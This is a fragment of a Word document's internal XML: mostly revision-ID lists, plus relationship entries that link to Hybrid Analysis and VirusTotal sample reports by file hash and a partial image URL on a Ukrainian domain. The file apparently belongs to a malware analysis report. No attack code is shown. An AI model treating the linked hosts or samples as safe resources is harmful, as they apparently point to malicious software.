    <w:rsid w:val="00836B1D"/>
    <w:rsid w:val="00853432"/>
    <w:rsid w:val="008534BE"/>
    <w:rsid w:val="00856000"/>
    <w:rsid w:val="008569EB"/>
    <w:rsid w:val="00863DCB"/>
    <w:rsid w:val="00882C36"/>
    <w:rsid w:val="00887AAF"/>
    <w:rsid w:val="00891227"/>
    <w:rsid w:val="008913D0"/>
    <w:rsid w:val="00893B9A"/>
    <w:rsid w:val="008A790C"/>
    <w:rsid w:val="008C48F1"/>
    <w:rsid w:val="008C4CB5"/>
    <w:rsid w:val="008C5E20"/>
    <w:rsid w:val="008D6AFE"/>
    <w:rsid w:val="008D6C4D"/>
    <w:rsid w:val="008E11BD"/>
    <w:rsid w:val="008E5ACE"/>
    <w:rsid w:val="008E634E"/>
    <w:rsid w:val="008E70B1"/>
    <w:rsid w:val="008F7785"/>
    <w:rsid w:val="00907FD7"/>
    <w:rsid w:val="009137A3"/>
    <w:rsid w:val="00917645"/>
    <w:rsid w:val="00917D90"/>
    <w:rsid w:val="00921DF8"/>
    <w:rsid w:val="00923E95"/>
    <w:rsid w:val="00931D46"/>
    <w:rsid w:val="0093477C"/>
    <w:rsid w:val="009449CA"/>
    <w:rsid w:val="00960728"/>
    <w:rsid w:val="00961BBB"/>
    <w:rsid w:val="00962492"/>
    <w:rsid w:val="00964ABE"/>
    <w:rsid w:val="009729A7"/>
    <w:rsid w:val="00974A38"/>
    <w:rsid w:val="00976689"/>
    <w:rsid w:val="00983861"/>
    <w:rsid w:val="00985035"/>
    <w:rsid w:val="00994B8B"/>
    <w:rsid w:val="00996507"/>
    <w:rsid w:val="009A68B4"/>
    <w:rsid w:val="009A77CB"/>
    <w:rsid w:val="009B1702"/>
    <w:rsid w:val="009C09F3"/>
    <w:rsid w:val="009C0BC2"/>
    <w:rsid w:val="009C0CF1"/>
    <w:rsid w:val="009C5AD3"/>
    <w:rsid w:val="009C62AC"/>
    <w:rsid w:val="009D0645"/>
    <w:rsid w:val="009E0867"/>
    <w:rsid w:val="009E1DD2"/>
    <w:rsid w:val="009E3FE1"/>
    <w:rsid w:val="009E61EF"/>
    <w:rsid w:val="009F270C"/>
    <w:rsid w:val="009F5065"/>
    <w:rsid w:val="00A02DEC"/>
    <w:rsid w:val="00A20237"/>
    <w:rsid w:val="00A2111C"/>
    <w:rsid w:val="00A233A8"/>
    <w:rsid w:val="00A269CE"/>
    <w:rsid w:val="00A4729B"/>
    <w:rsid w:val="00A564BC"/>
    <w:rsid w:val="00A57DCD"/>
    <w:rsid w:val="00A64183"/>
    <w:rsid w:val="00A6653F"/>
    <w:rsid w:val="00A75A95"/>
    <w:rsid w:val="00A8138A"/>
    <w:rsid w:val="00A8418F"/>
    <w:rsid w:val="00A8426E"/>
    <w:rsid w:val="00A849F9"/>
    <w:rsid w:val="00AA18E4"/>
    <w:rsid w:val="00AA2ABF"/>
    <w:rsid w:val="00AB07CB"/>
    <w:rsid w:val="00AB5138"/>
    <w:rsid w:val="00AB6F1C"/>
    <w:rsid w:val="00AC0AC5"/>
    <w:rsid w:val="00AC2679"/>
    <w:rsid w:val="00AD03E2"/>
    <w:rsid w:val="00AD28E6"/>
    <w:rsid w:val="00AD6001"/>
    <w:rsid w:val="00AD7014"/>
    <w:rsid w:val="00AE1D8A"/>
    <w:rsid w:val="00AE243B"/>
    <w:rsid w:val="00AE53D9"/>
    <w:rsid w:val="00AE77BD"/>
    <w:rsid w:val="00AF6569"/>
    <w:rsid w:val="00B13B4B"/>
    <w:rsid w:val="00B13F11"/>
    <w:rsid w:val="00B15F81"/>
    <w:rsid w:val="00B16659"/>
    <w:rsid w:val="00B249CD"/>
    <w:rsid w:val="00B272EF"/>
    <w:rsid w:val="00B3662F"/>
    <w:rsid w:val="00B50038"/>
    <w:rsid w:val="00B56D3A"/>
    <w:rsid w:val="00B5756C"/>
    <w:rsid w:val="00B6403B"/>
    <w:rsid w:val="00B65141"/>
    <w:rsid w:val="00B668B0"/>
    <w:rsid w:val="00B702B8"/>
    <w:rsid w:val="00B8282C"/>
    <w:rsid w:val="00B8581C"/>
    <w:rsid w:val="00B87AFD"/>
    <w:rsid w:val="00B87E49"/>
    <w:rsid w:val="00B959DE"/>
    <w:rsid w:val="00B968FE"/>
    <w:rsid w:val="00BA5DEF"/>
    <w:rsid w:val="00BB61CB"/>
    <w:rsid w:val="00BB739D"/>
    <w:rsid w:val="00BC458C"/>
    <w:rsid w:val="00BC502B"/>
    <w:rsid w:val="00BC77AB"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rsid w:val="00BE1C48"/>
    <w:rsid w:val="00BE1C91"/>
    <w:rsid w:val="00BF3E70"/>
    <w:rsid w:val="00BF5A99"/>
    <w:rsid w:val="00C036FF"/>
    <w:rsid w:val="00C110F4"/>
    <w:rsid w:val="00C174D6"/>
    <w:rsid w:val="00C212CE"/>
    <w:rsid w:val="00C35D2F"/>
    <w:rsid w:val="00C36D29"/>
    <w:rsid w:val="00C36F05"/>
    <w:rsid w:val="00C41ABB"/>
    <w:rsid w:val="00C43D41"/>
    <w:rsid w:val="00C4539A"/>
    <w:rsid w:val="00C469D8"/>
    <w:rsid w:val="00C46B13"/>
    <w:rsid w:val="00C46DBC"/>
    <w:rsid w:val="00C5031D"/>
    <w:rsid w:val="00C5168B"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rsid w:val="00C6615B"/>
    <w:rsid w:val="00C77E41"/>
    <w:rsid w:val="00C819B4"/>
    <w:rsid w:val="00C95241"/>
    <w:rsid w:val="00C97109"/>
    <w:rsid w:val="00CC19CF"/>
    <w:rsid w:val="00CD69E8"/>
    <w:rsid w:val="00CF0BB8"/>
    <w:rsid w:val="00CF2934"/>
    <w:rsid w:val="00D12BC6"/>
    <w:rsid w:val="00D138D9"/>
    <w:rsid w:val="00D139C3"/>
    <w:rsid w:val="00D23791"/>
    <w:rsid w:val="00D24CF4"/>
    <w:rsid w:val="00D27562"/>
    <w:rsid w:val="00D32446"/>
    <w:rsid w:val="00D368E7"/>
    <w:rsid w:val="00D4660F"/>
    <w:rsid w:val="00D5217D"/>
    <w:rsid w:val="00D52829"/>
    <w:rsid w:val="00D55456"/>
    <w:rsid w:val="00D56E94"/>
    <w:rsid w:val="00D60F71"/>
    <w:rsid w:val="00D6403C"/>
    <w:rsid w:val="00D8289B"/>
    <w:rsid w:val="00DA3AA4"/>
    <w:rsid w:val="00DB66C1"/>
    <w:rsid w:val="00DB741A"/>
    <w:rsid w:val="00DC75F7"/>
    <w:rsid w:val="00DD50B8"/>
    <w:rsid w:val="00DE7BBB"/>
    <w:rsid w:val="00DE7CE6"/>
    <w:rsid w:val="00DE7F27"/>
    <w:rsid w:val="00DF15D9"/>
    <w:rsid w:val="00E0023D"/>
    <w:rsid w:val="00E04CD8"/>
    <w:rsid w:val="00E13401"/>
    <w:rsid w:val="00E16544"/>
    <w:rsid w:val="00E2253B"/>
    <w:rsid w:val="00E25232"/>
    <w:rsid w:val="00E25791"/>
    <w:rsid w:val="00E372BA"/>
    <w:rsid w:val="00E416B2"/>
    <w:rsid w:val="00E618DD"/>
    <w:rsid w:val="00E61ED6"/>
    <w:rsid w:val="00E675B9"/>
    <w:rsid w:val="00E7558B"/>
    <w:rsid w:val="00E802CE"/>
    <w:rsid w:val="00E80FFE"/>
    <w:rsid w:val="00E9452C"/>
    <w:rsid w:val="00E969C4"/>
    <w:rsid w:val="00E97AE7"/>
    <w:rsid w:val="00EA3CF2"/>
    <w:rsid w:val="00EB26C0"/>
    <w:rsid w:val="00EB2951"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EC06C5"/>
    <w:rsid w:val="00EC773C"/>
    <w:rsid w:val="00ED3623"/>
    <w:rsid w:val="00ED63E1"/>
    <w:rsid w:val="00EE07BC"/>
    <w:rsid w:val="00EE4A8C"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00EF6811"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F23163"/>
    <w:rsid w:val="00F352F2"/>
    <w:rsid w:val="00F401F4"/>
    <w:rsid w:val="00F42412"/>
    <w:rsid w:val="00F46A54"/>
    <w:rsid w:val="00F46E5A"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F631EC"/>
    <w:rsid w:val="00F66B38"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F721C9"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F81C0F"/>
    <w:rsid w:val="00F822FA"/>
    <w:rsid w:val="00F82DF4"/>
    <w:rsid w:val="00F84DEF"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00FA32D6"/>
    <w:rsid w:val="00FB359E"/>
    <w:rsid w:val="00FB4C79"/>
    <w:rsid w:val="00FB5D42"/>
    <w:rsid w:val="00FC0005"/>
    <w:rsid w:val="00FD28E8"/>
    <w:rsid w:val="00FD44CC"/>
    <w:rsid w:val="00FD498F"/>
    <w:rsid w:val="00FE2979"/>
    <w:rsid w:val="00FE7FAB"/>
    <w:rsid w:val="00FF0CA2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AD60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D600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5"/>
    <w:rsid w:val="00AD6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3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1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pbank.co.ua/img/rKPGshUCwICOdqe1P8Ig5odmykCedtG2zar.png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hyperlink" Target="https://hybrid-analysis.com/sample/6c52a5850a57bea43a0a52ff0e2d2179653b97ae5406e884aee63e1cf340f58b/6556888e15e3439b0c04afd2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hybrid-analysis.com/sample/6c52a5850a57bea43a0a52ff0e2d2179653b97ae5406e884aee63e1cf340f58b/6556888e15e3439b0c04afd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hybrid-analysis.com/sample/b60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22/65196c433ce352131806c19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hybrid-analysis.com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hyperlink" Target="https://www.virustotal.com/gui/file/f50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321/behavior" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal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C28BD-D395-4720-95C3-020727423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5080</Words>
  <Characters>28962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2025-11-17T08:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>